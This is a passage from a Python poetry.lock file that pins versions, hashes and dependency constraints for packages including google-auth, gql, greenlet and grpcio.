requests = ">=2.18.0,<3.0.0dev"
[package.extras]
grpc = ["grpcio (>=1.33.2,<2.0dev)", "grpcio-status (>=1.33.2,<2.0dev)"]
grpcgcp = ["grpcio-gcp (>=0.2.2,<1.0dev)"]
grpcio-gcp = ["grpcio-gcp (>=0.2.2,<1.0dev)"]
[[package]]
name = "google-api-core"
version = "2.12.0"
description = "Google API client core library"
optional = true
python-versions = ">=3.7"
files = [
{file = "google-api-core-2.12.0.tar.gz", hash = "sha256:c22e01b1e3c4dcd90998494879612c38d0a3411d1f7b679eb89e2abe3ce1f553"},
{file = "google_api_core-2.12.0-py3-none-any.whl", hash = "sha256:ec6054f7d64ad13b41e43d96f735acbd763b0f3b695dabaa2d579673f6a6e160"},
]
[package.dependencies]
google-auth = ">=2.14.1,<3.0.dev0"
googleapis-common-protos = ">=1.56.2,<2.0.dev0"
grpcio = {version = ">=1.33.2,<2.0dev", optional = true, markers = "python_version < \"3.11\" and extra == \"grpc\""}
grpcio-status = {version = ">=1.33.2,<2.0.dev0", optional = true, markers = "python_version < \"3.11\" and extra == \"grpc\""}
protobuf = ">=3.19.5,<3.20.0 || >3.20.0,<3.20.1 || >3.20.1,<4.21.0 || >4.21.0,<4.21.1 || >4.21.1,<4.21.2 || >4.21.2,<4.21.3 || >4.21.3,<4.21.4 || >4.21.4,<4.21.5 || >4.21.5,<5.0.0.dev0"
requests = ">=2.18.0,<3.0.0.dev0"
[package.extras]
grpc = ["grpcio (>=1.33.2,<2.0dev)", "grpcio (>=1.49.1,<2.0dev)", "grpcio-status (>=1.33.2,<2.0.dev0)", "grpcio-status (>=1.49.1,<2.0.dev0)"]
grpcgcp = ["grpcio-gcp (>=0.2.2,<1.0.dev0)"]
grpcio-gcp = ["grpcio-gcp (>=0.2.2,<1.0.dev0)"]
[[package]]
name = "google-api-python-client"
version = "2.70.0"
description = "Google API Client Library for Python"
optional = true
python-versions = ">=3.7"
files = [
{file = "google-api-python-client-2.70.0.tar.gz", hash = "sha256:262de094d5a30d337f59e66581019fed45b698c078397ac48dd323c0968236e7"},
{file = "google_api_python_client-2.70.0-py2.py3-none-any.whl", hash = "sha256:67da78956f2bf4b763305cd791aeab250878c1f88f1422aaba4682a608b8e5a4"},
]
[package.dependencies]
google-api-core = ">=1.31.5,<2.0.dev0 || >2.3.0,<3.0.0dev"
google-auth = ">=1.19.0,<3.0.0dev"
google-auth-httplib2 = ">=0.1.0"
httplib2 = ">=0.15.0,<1dev"
uritemplate = ">=3.0.1,<5"
[[package]]
name = "google-auth"
version = "2.23.3"
description = "Google Authentication Library"
optional = true
python-versions = ">=3.7"
files = [
{file = "google-auth-2.23.3.tar.gz", hash = "sha256:6864247895eea5d13b9c57c9e03abb49cb94ce2dc7c58e91cba3248c7477c9e3"},
{file = "google_auth-2.23.3-py2.py3-none-any.whl", hash = "sha256:a8f4608e65c244ead9e0538f181a96c6e11199ec114d41f1d7b1bffa96937bda"},
]
[package.dependencies]
cachetools = ">=2.0.0,<6.0"
pyasn1-modules = ">=0.2.1"
rsa = ">=3.1.4,<5"
[package.extras]
aiohttp = ["aiohttp (>=3.6.2,<4.0.0.dev0)", "requests (>=2.20.0,<3.0.0.dev0)"]
enterprise-cert = ["cryptography (==36.0.2)", "pyopenssl (==22.0.0)"]
pyopenssl = ["cryptography (>=38.0.3)", "pyopenssl (>=20.0.0)"]
reauth = ["pyu2f (>=0.1.5)"]
requests = ["requests (>=2.20.0,<3.0.0.dev0)"]
[[package]]
name = "google-auth-httplib2"
version = "0.1.1"
description = "Google Authentication Library: httplib2 transport"
optional = true
python-versions = "*"
files = [
{file = "google-auth-httplib2-0.1.1.tar.gz", hash = "sha256:c64bc555fdc6dd788ea62ecf7bccffcf497bf77244887a3f3d7a5a02f8e3fc29"},
{file = "google_auth_httplib2-0.1.1-py2.py3-none-any.whl", hash = "sha256:42c50900b8e4dcdf8222364d1f0efe32b8421fb6ed72f2613f12f75cc933478c"},
]
[package.dependencies]
google-auth = "*"
httplib2 = ">=0.19.0"
[[package]]
name = "google-auth-oauthlib"
version = "0.4.6"
description = "Google Authentication Library"
optional = true
python-versions = ">=3.6"
files = [
{file = "google-auth-oauthlib-0.4.6.tar.gz", hash = "sha256:a90a072f6993f2c327067bf65270046384cda5a8ecb20b94ea9a687f1f233a7a"},
{file = "google_auth_oauthlib-0.4.6-py2.py3-none-any.whl", hash = "sha256:3f2a6e802eebbb6fb736a370fbf3b055edcb6b52878bf2f26330b5e041316c73"},
]
[package.dependencies]
google-auth = ">=1.0.0"
requests-oauthlib = ">=0.7.0"
[package.extras]
tool = ["click (>=6.0.0)"]
[[package]]
name = "google-cloud-documentai"
version = "2.20.1"
description = "Google Cloud Documentai API client library"
optional = true
python-versions = ">=3.7"
files = [
{file = "google-cloud-documentai-2.20.1.tar.gz", hash = "sha256:eba90546c80177bab7ee8aa3f4b7b1f89cf3ce9752032e359a15d0fbf2225fb0"},
{file = "google_cloud_documentai-2.20.1-py2.py3-none-any.whl", hash = "sha256:793a2e59c425655c951055810635798b5ef56fed164e35b2bd521e5c30ab279e"},
]
[package.dependencies]
google-api-core = {version = ">=1.34.0,<2.0.dev0 || >=2.11.dev0,<3.0.0dev", extras = ["grpc"]}
proto-plus = [
{version = ">=1.22.2,<2.0.0dev", markers = "python_version >= \"3.11\""},
{version = ">=1.22.0,<2.0.0dev", markers = "python_version < \"3.11\""},
]
protobuf = ">=3.19.5,<3.20.0 || >3.20.0,<3.20.1 || >3.20.1,<4.21.0 || >4.21.0,<4.21.1 || >4.21.1,<4.21.2 || >4.21.2,<4.21.3 || >4.21.3,<4.21.4 || >4.21.4,<4.21.5 || >4.21.5,<5.0.0dev"
[[package]]
name = "google-pasta"
version = "0.2.0"
description = "pasta is an AST-based Python refactoring library"
optional = true
python-versions = "*"
files = [
{file = "google-pasta-0.2.0.tar.gz", hash = "sha256:c9f2c8dfc8f96d0d5808299920721be30c9eec37f2389f28904f454565c8a16e"},
{file = "google_pasta-0.2.0-py2-none-any.whl", hash = "sha256:4612951da876b1a10fe3960d7226f0c7682cf901e16ac06e473b267a5afa8954"},
{file = "google_pasta-0.2.0-py3-none-any.whl", hash = "sha256:b32482794a366b5366a32c92a9a9201b107821889935a02b3e51f6b432ea84ed"},
]
[package.dependencies]
six = "*"
[[package]]
name = "google-search-results"
version = "2.4.2"
description = "Scrape and search localized results from Google, Bing, Baidu, Yahoo, Yandex, Ebay, Homedepot, youtube at scale using SerpApi.com"
optional = true
python-versions = ">=3.5"
files = [
{file = "google_search_results-2.4.2.tar.gz", hash = "sha256:603a30ecae2af8e600b22635757a6df275dad4b934f975e67878ccd640b78245"},
]
[package.dependencies]
requests = "*"
[[package]]
name = "googleapis-common-protos"
version = "1.61.0"
description = "Common protobufs used in Google APIs"
optional = true
python-versions = ">=3.7"
files = [
{file = "googleapis-common-protos-1.61.0.tar.gz", hash = "sha256:8a64866a97f6304a7179873a465d6eee97b7a24ec6cfd78e0f575e96b821240b"},
{file = "googleapis_common_protos-1.61.0-py2.py3-none-any.whl", hash = "sha256:22f1915393bb3245343f6efe87f6fe868532efc12aa26b391b15132e1279f1c0"},
]
[package.dependencies]
protobuf = ">=3.19.5,<3.20.0 || >3.20.0,<3.20.1 || >3.20.1,<4.21.1 || >4.21.1,<4.21.2 || >4.21.2,<4.21.3 || >4.21.3,<4.21.4 || >4.21.4,<4.21.5 || >4.21.5,<5.0.0.dev0"
[package.extras]
grpc = ["grpcio (>=1.44.0,<2.0.0.dev0)"]
[[package]]
name = "gptcache"
version = "0.1.42"
description = "GPTCache, a powerful caching library that can be used to speed up and lower the cost of chat applications that rely on the LLM service. GPTCache works as a memcache for AIGC applications, similar to how Redis works for traditional applications."
optional = true
python-versions = ">=3.8.1"
files = [
{file = "gptcache-0.1.42-py3-none-any.whl", hash = "sha256:8da93cd9fdc3a1c09aae25b688823b4a5bc28dcfa4522e33617f3f7a9e5b8bb0"},
{file = "gptcache-0.1.42.tar.gz", hash = "sha256:17339c41d992bd47c623c716be3bd915dba2687a0fa52aa4ab4ed9cc7cc2b256"},
]
[package.dependencies]
cachetools = "*"
numpy = "*"
requests = "*"
[[package]]
name = "gql"
version = "3.4.1"
description = "GraphQL client for Python"
optional = true
python-versions = "*"
files = [
{file = "gql-3.4.1-py2.py3-none-any.whl", hash = "sha256:315624ca0f4d571ef149d455033ebd35e45c1a13f18a059596aeddcea99135cf"},
{file = "gql-3.4.1.tar.gz", hash = "sha256:11dc5d8715a827f2c2899593439a4f36449db4f0eafa5b1ea63948f8a2f8c545"},
]
[package.dependencies]
backoff = ">=1.11.1,<3.0"
graphql-core = ">=3.2,<3.3"
yarl = ">=1.6,<2.0"
[package.extras]
aiohttp = ["aiohttp (>=3.7.1,<3.9.0)"]
all = ["aiohttp (>=3.7.1,<3.9.0)", "botocore (>=1.21,<2)", "requests (>=2.26,<3)", "requests-toolbelt (>=0.9.1,<1)", "urllib3 (>=1.26,<2)", "websockets (>=10,<11)", "websockets (>=9,<10)"]
botocore = ["botocore (>=1.21,<2)"]
dev = ["aiofiles", "aiohttp (>=3.7.1,<3.9.0)", "black (==22.3.0)", "botocore (>=1.21,<2)", "check-manifest (>=0.42,<1)", "flake8 (==3.8.1)", "isort (==4.3.21)", "mock (==4.0.2)", "mypy (==0.910)", "parse (==1.15.0)", "pytest (==6.2.5)", "pytest-asyncio (==0.16.0)", "pytest-console-scripts (==1.3.1)", "pytest-cov (==3.0.0)", "requests (>=2.26,<3)", "requests-toolbelt (>=0.9.1,<1)", "sphinx (>=3.0.0,<4)", "sphinx-argparse (==0.2.5)", "sphinx-rtd-theme (>=0.4,<1)", "types-aiofiles", "types-mock", "types-requests", "urllib3 (>=1.26,<2)", "vcrpy (==4.0.2)", "websockets (>=10,<11)", "websockets (>=9,<10)"]
requests = ["requests (>=2.26,<3)", "requests-toolbelt (>=0.9.1,<1)", "urllib3 (>=1.26,<2)"]
test = ["aiofiles", "aiohttp (>=3.7.1,<3.9.0)", "botocore (>=1.21,<2)", "mock (==4.0.2)", "parse (==1.15.0)", "pytest (==6.2.5)", "pytest-asyncio (==0.16.0)", "pytest-console-scripts (==1.3.1)", "pytest-cov (==3.0.0)", "requests (>=2.26,<3)", "requests-toolbelt (>=0.9.1,<1)", "urllib3 (>=1.26,<2)", "vcrpy (==4.0.2)", "websockets (>=10,<11)", "websockets (>=9,<10)"]
test-no-transport = ["aiofiles", "mock (==4.0.2)", "parse (==1.15.0)", "pytest (==6.2.5)", "pytest-asyncio (==0.16.0)", "pytest-console-scripts (==1.3.1)", "pytest-cov (==3.0.0)", "vcrpy (==4.0.2)"]
websockets = ["websockets (>=10,<11)", "websockets (>=9,<10)"]
[[package]]
name = "graphql-core"
version = "3.2.3"
description = "GraphQL implementation for Python, a port of GraphQL.js, the JavaScript reference implementation for GraphQL."
optional = true
python-versions = ">=3.6,<4"
files = [
{file = "graphql-core-3.2.3.tar.gz", hash = "sha256:06d2aad0ac723e35b1cb47885d3e5c45e956a53bc1b209a9fc5369007fe46676"},
{file = "graphql_core-3.2.3-py3-none-any.whl", hash = "sha256:5766780452bd5ec8ba133f8bf287dc92713e3868ddd83aee4faab9fc3e303dc3"},
]
[[package]]
name = "greenlet"
version = "3.0.0"
description = "Lightweight in-process concurrent programming"
optional = false
python-versions = ">=3.7"
files = [
{file = "greenlet-3.0.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:e09dea87cc91aea5500262993cbd484b41edf8af74f976719dd83fe724644cd6"},
{file = "greenlet-3.0.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f47932c434a3c8d3c86d865443fadc1fbf574e9b11d6650b656e602b1797908a"},
{file = "greenlet-3.0.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:bdfaeecf8cc705d35d8e6de324bf58427d7eafb55f67050d8f28053a3d57118c"},
{file = "greenlet-3.0.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:6a68d670c8f89ff65c82b936275369e532772eebc027c3be68c6b87ad05ca695"},
{file = "greenlet-3.0.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:38ad562a104cd41e9d4644f46ea37167b93190c6d5e4048fcc4b80d34ecb278f"},
{file = "greenlet-3.0.0-cp310-cp310-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:02a807b2a58d5cdebb07050efe3d7deaf915468d112dfcf5e426d0564aa3aa4a"},
{file = "greenlet-3.0.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:b1660a15a446206c8545edc292ab5c48b91ff732f91b3d3b30d9a915d5ec4779"},
{file = "greenlet-3.0.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:813720bd57e193391dfe26f4871186cf460848b83df7e23e6bef698a7624b4c9"},
{file = "greenlet-3.0.0-cp310-cp310-win_amd64.whl", hash = "sha256:aa15a2ec737cb609ed48902b45c5e4ff6044feb5dcdfcf6fa8482379190330d7"},
{file = "greenlet-3.0.0-cp310-universal2-macosx_11_0_x86_64.whl", hash = "sha256:7709fd7bb02b31908dc8fd35bfd0a29fc24681d5cc9ac1d64ad07f8d2b7db62f"},
{file = "greenlet-3.0.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:211ef8d174601b80e01436f4e6905aca341b15a566f35a10dd8d1e93f5dbb3b7"},
{file = "greenlet-3.0.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6512592cc49b2c6d9b19fbaa0312124cd4c4c8a90d28473f86f92685cc5fef8e"},
{file = "greenlet-3.0.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:871b0a8835f9e9d461b7fdaa1b57e3492dd45398e87324c047469ce2fc9f516c"},
{file = "greenlet-3.0.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b505fcfc26f4148551826a96f7317e02c400665fa0883fe505d4fcaab1dabfdd"},
{file = "greenlet-3.0.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:123910c58234a8d40eaab595bc56a5ae49bdd90122dde5bdc012c20595a94c14"},
{file = "greenlet-3.0.0-cp311-cp311-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:96d9ea57292f636ec851a9bb961a5cc0f9976900e16e5d5647f19aa36ba6366b"},
{file = "greenlet-3.0.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:0b72b802496cccbd9b31acea72b6f87e7771ccfd7f7927437d592e5c92ed703c"},
{file = "greenlet-3.0.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:527cd90ba3d8d7ae7dceb06fda619895768a46a1b4e423bdb24c1969823b8362"},
{file = "greenlet-3.0.0-cp311-cp311-win_amd64.whl", hash = "sha256:37f60b3a42d8b5499be910d1267b24355c495064f271cfe74bf28b17b099133c"},
{file = "greenlet-3.0.0-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:1482fba7fbed96ea7842b5a7fc11d61727e8be75a077e603e8ab49d24e234383"},
{file = "greenlet-3.0.0-cp312-cp312-macosx_13_0_arm64.whl", hash = "sha256:be557119bf467d37a8099d91fbf11b2de5eb1fd5fc5b91598407574848dc910f"},
{file = "greenlet-3.0.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:73b2f1922a39d5d59cc0e597987300df3396b148a9bd10b76a058a2f2772fc04"},
{file = "greenlet-3.0.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:d1e22c22f7826096ad503e9bb681b05b8c1f5a8138469b255eb91f26a76634f2"},
{file = "greenlet-3.0.0-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:1d363666acc21d2c204dd8705c0e0457d7b2ee7a76cb16ffc099d6799744ac99"},
{file = "greenlet-3.0.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:334ef6ed8337bd0b58bb0ae4f7f2dcc84c9f116e474bb4ec250a8bb9bd797a66"},
{file = "greenlet-3.0.0-cp312-cp312-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:6672fdde0fd1a60b44fb1751a7779c6db487e42b0cc65e7caa6aa686874e79fb"},
{file = "greenlet-3.0.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:952256c2bc5b4ee8df8dfc54fc4de330970bf5d79253c863fb5e6761f00dda35"},
{file = "greenlet-3.0.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:269d06fa0f9624455ce08ae0179430eea61085e3cf6457f05982b37fd2cefe17"},
{file = "greenlet-3.0.0-cp312-cp312-win_amd64.whl", hash = "sha256:9adbd8ecf097e34ada8efde9b6fec4dd2a903b1e98037adf72d12993a1c80b51"},
{file = "greenlet-3.0.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c6b5ce7f40f0e2f8b88c28e6691ca6806814157ff05e794cdd161be928550f4c"},
{file = "greenlet-3.0.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ecf94aa539e97a8411b5ea52fc6ccd8371be9550c4041011a091eb8b3ca1d810"},
{file = "greenlet-3.0.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:80dcd3c938cbcac986c5c92779db8e8ce51a89a849c135172c88ecbdc8c056b7"},
{file = "greenlet-3.0.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e52a712c38e5fb4fd68e00dc3caf00b60cb65634d50e32281a9d6431b33b4af1"},
{file = "greenlet-3.0.0-cp37-cp37m-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:d5539f6da3418c3dc002739cb2bb8d169056aa66e0c83f6bacae0cd3ac26b423"},
{file = "greenlet-3.0.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:343675e0da2f3c69d3fb1e894ba0a1acf58f481f3b9372ce1eb465ef93cf6fed"},
{file = "greenlet-3.0.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:abe1ef3d780de56defd0c77c5ba95e152f4e4c4e12d7e11dd8447d338b85a625"},
{file = "greenlet-3.0.0-cp37-cp37m-win32.whl", hash = "sha256:e693e759e172fa1c2c90d35dea4acbdd1d609b6936115d3739148d5e4cd11947"},
{file = "greenlet-3.0.0-cp37-cp37m-win_amd64.whl", hash = "sha256:bdd696947cd695924aecb3870660b7545a19851f93b9d327ef8236bfc49be705"},
{file = "greenlet-3.0.0-cp37-universal2-macosx_11_0_x86_64.whl", hash = "sha256:cc3e2679ea13b4de79bdc44b25a0c4fcd5e94e21b8f290791744ac42d34a0353"},
{file = "greenlet-3.0.0-cp38-cp38-macosx_11_0_universal2.whl", hash = "sha256:63acdc34c9cde42a6534518e32ce55c30f932b473c62c235a466469a710bfbf9"},
{file = "greenlet-3.0.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4a1a6244ff96343e9994e37e5b4839f09a0207d35ef6134dce5c20d260d0302c"},
{file = "greenlet-3.0.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b822fab253ac0f330ee807e7485769e3ac85d5eef827ca224feaaefa462dc0d0"},
{file = "greenlet-3.0.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:8060b32d8586e912a7b7dac2d15b28dbbd63a174ab32f5bc6d107a1c4143f40b"},
{file = "greenlet-3.0.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:621fcb346141ae08cb95424ebfc5b014361621b8132c48e538e34c3c93ac7365"},
{file = "greenlet-3.0.0-cp38-cp38-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:6bb36985f606a7c49916eff74ab99399cdfd09241c375d5a820bb855dfb4af9f"},
{file = "greenlet-3.0.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:10b5582744abd9858947d163843d323d0b67be9432db50f8bf83031032bc218d"},
{file = "greenlet-3.0.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:f351479a6914fd81a55c8e68963609f792d9b067fb8a60a042c585a621e0de4f"},
{file = "greenlet-3.0.0-cp38-cp38-win32.whl", hash = "sha256:9de687479faec7db5b198cc365bc34addd256b0028956501f4d4d5e9ca2e240a"},
{file = "greenlet-3.0.0-cp38-cp38-win_amd64.whl", hash = "sha256:3fd2b18432e7298fcbec3d39e1a0aa91ae9ea1c93356ec089421fabc3651572b"},
{file = "greenlet-3.0.0-cp38-universal2-macosx_11_0_x86_64.whl", hash = "sha256:3c0d36f5adc6e6100aedbc976d7428a9f7194ea79911aa4bf471f44ee13a9464"},
{file = "greenlet-3.0.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:4cd83fb8d8e17633ad534d9ac93719ef8937568d730ef07ac3a98cb520fd93e4"},
{file = "greenlet-3.0.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6a5b2d4cdaf1c71057ff823a19d850ed5c6c2d3686cb71f73ae4d6382aaa7a06"},
{file = "greenlet-3.0.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2e7dcdfad252f2ca83c685b0fa9fba00e4d8f243b73839229d56ee3d9d219314"},
{file = "greenlet-3.0.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c94e4e924d09b5a3e37b853fe5924a95eac058cb6f6fb437ebb588b7eda79870"},
{file = "greenlet-3.0.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ad6fb737e46b8bd63156b8f59ba6cdef46fe2b7db0c5804388a2d0519b8ddb99"},
{file = "greenlet-3.0.0-cp39-cp39-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:d55db1db455c59b46f794346efce896e754b8942817f46a1bada2d29446e305a"},
{file = "greenlet-3.0.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:56867a3b3cf26dc8a0beecdb4459c59f4c47cdd5424618c08515f682e1d46692"},
{file = "greenlet-3.0.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:9a812224a5fb17a538207e8cf8e86f517df2080c8ee0f8c1ed2bdaccd18f38f4"},
{file = "greenlet-3.0.0-cp39-cp39-win32.whl", hash = "sha256:0d3f83ffb18dc57243e0151331e3c383b05e5b6c5029ac29f754745c800f8ed9"},
{file = "greenlet-3.0.0-cp39-cp39-win_amd64.whl", hash = "sha256:831d6f35037cf18ca5e80a737a27d822d87cd922521d18ed3dbc8a6967be50ce"},
{file = "greenlet-3.0.0-cp39-universal2-macosx_11_0_x86_64.whl", hash = "sha256:a048293392d4e058298710a54dfaefcefdf49d287cd33fb1f7d63d55426e4355"},
{file = "greenlet-3.0.0.tar.gz", hash = "sha256:19834e3f91f485442adc1ee440171ec5d9a4840a1f7bd5ed97833544719ce10b"},
]
[package.extras]
docs = ["Sphinx"]
test = ["objgraph", "psutil"]
[[package]]
name = "grpcio"
version = "1.59.0"
description = "HTTP/2-based RPC framework"
optional = true
python-versions = ">=3.7"
files = [
{file = "grpcio-1.59.0-cp310-cp310-linux_armv7l.whl", hash = "sha256:225e5fa61c35eeaebb4e7491cd2d768cd8eb6ed00f2664fa83a58f29418b39fd"},
{file = "grpcio-1.59.0-cp310-cp310-macosx_12_0_universal2.whl", hash = "sha256:b95ec8ecc4f703f5caaa8d96e93e40c7f589bad299a2617bdb8becbcce525539"},
{file = "grpcio-1.59.0-cp310-cp310-manylinux_2_17_aarch64.whl", hash = "sha256:1a839ba86764cc48226f50b924216000c79779c563a301586a107bda9cbe9dcf"},
{file = "grpcio-1.59.0-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:f6cfe44a5d7c7d5f1017a7da1c8160304091ca5dc64a0f85bca0d63008c3137a"},
{file = "grpcio-1.59.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d0fcf53df684fcc0154b1e61f6b4a8c4cf5f49d98a63511e3f30966feff39cd0"},
{file = "grpcio-1.59.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:fa66cac32861500f280bb60fe7d5b3e22d68c51e18e65367e38f8669b78cea3b"},
{file = "grpcio-1.59.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:8cd2d38c2d52f607d75a74143113174c36d8a416d9472415eab834f837580cf7"},
{file = "grpcio-1.59.0-cp310-cp310-win32.whl", hash = "sha256:228b91ce454876d7eed74041aff24a8f04c0306b7250a2da99d35dd25e2a1211"},
{file = "grpcio-1.59.0-cp310-cp310-win_amd64.whl", hash = "sha256:ca87ee6183421b7cea3544190061f6c1c3dfc959e0b57a5286b108511fd34ff4"},
{file = "grpcio-1.59.0-cp311-cp311-linux_armv7l.whl", hash = "sha256:c173a87d622ea074ce79be33b952f0b424fa92182063c3bda8625c11d3585d09"},
{file = "grpcio-1.59.0-cp311-cp311-macosx_10_10_universal2.whl", hash = "sha256:ec78aebb9b6771d6a1de7b6ca2f779a2f6113b9108d486e904bde323d51f5589"},
{file = "grpcio-1.59.0-cp311-cp311-manylinux_2_17_aarch64.whl", hash = "sha256:0b84445fa94d59e6806c10266b977f92fa997db3585f125d6b751af02ff8b9fe"},
{file = "grpcio-1.59.0-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c251d22de8f9f5cca9ee47e4bade7c5c853e6e40743f47f5cc02288ee7a87252"},
{file = "grpcio-1.59.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:956f0b7cb465a65de1bd90d5a7475b4dc55089b25042fe0f6c870707e9aabb1d"},
{file = "grpcio-1.59.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:38da5310ef84e16d638ad89550b5b9424df508fd5c7b968b90eb9629ca9be4b9"},
{file = "grpcio-1.59.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:63982150a7d598281fa1d7ffead6096e543ff8be189d3235dd2b5604f2c553e5"},
{file = "grpcio-1.59.0-cp311-cp311-win32.whl", hash = "sha256:50eff97397e29eeee5df106ea1afce3ee134d567aa2c8e04fabab05c79d791a7"},
{file = "grpcio-1.59.0-cp311-cp311-win_amd64.whl", hash = "sha256:15f03bd714f987d48ae57fe092cf81960ae36da4e520e729392a59a75cda4f29"},
{file = "grpcio-1.59.0-cp312-cp312-linux_armv7l.whl", hash = "sha256:f1feb034321ae2f718172d86b8276c03599846dc7bb1792ae370af02718f91c5"},
{file = "grpcio-1.59.0-cp312-cp312-macosx_10_10_universal2.whl", hash = "sha256:d09bd2a4e9f5a44d36bb8684f284835c14d30c22d8ec92ce796655af12163588"},
{file = "grpcio-1.59.0-cp312-cp312-manylinux_2_17_aarch64.whl", hash = "sha256:2f120d27051e4c59db2f267b71b833796770d3ea36ca712befa8c5fff5da6ebd"},
{file = "grpcio-1.59.0-cp312-cp312-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ba0ca727a173ee093f49ead932c051af463258b4b493b956a2c099696f38aa66"},
{file = "grpcio-1.59.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5711c51e204dc52065f4a3327dca46e69636a0b76d3e98c2c28c4ccef9b04c52"},
{file = "grpcio-1.59.0-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:d74f7d2d7c242a6af9d4d069552ec3669965b74fed6b92946e0e13b4168374f9"},
{file = "grpcio-1.59.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:3859917de234a0a2a52132489c4425a73669de9c458b01c9a83687f1f31b5b10"},
{file = "grpcio-1.59.0-cp312-cp312-win32.whl", hash = "sha256:de2599985b7c1b4ce7526e15c969d66b93687571aa008ca749d6235d056b7205"},
{file = "grpcio-1.59.0-cp312-cp312-win_amd64.whl", hash = "sha256:598f3530231cf10ae03f4ab92d48c3be1fee0c52213a1d5958df1a90957e6a88"},
{file = "grpcio-1.59.0-cp37-cp37m-linux_armv7l.whl", hash = "sha256:b34c7a4c31841a2ea27246a05eed8a80c319bfc0d3e644412ec9ce437105ff6c"},
{file = "grpcio-1.59.0-cp37-cp37m-macosx_10_10_universal2.whl", hash = "sha256:c4dfdb49f4997dc664f30116af2d34751b91aa031f8c8ee251ce4dcfc11277b0"},
{file = "grpcio-1.59.0-cp37-cp37m-manylinux_2_17_aarch64.whl", hash = "sha256:61bc72a00ecc2b79d9695220b4d02e8ba53b702b42411397e831c9b0589f08a3"},
{file = "grpcio-1.59.0-cp37-cp37m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:f367e4b524cb319e50acbdea57bb63c3b717c5d561974ace0b065a648bb3bad3"},
{file = "grpcio-1.59.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:849c47ef42424c86af069a9c5e691a765e304079755d5c29eff511263fad9c2a"},
{file = "grpcio-1.59.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:c0488c2b0528e6072010182075615620071371701733c63ab5be49140ed8f7f0"},
{file = "grpcio-1.59.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:611d9aa0017fa386809bddcb76653a5ab18c264faf4d9ff35cb904d44745f575"},
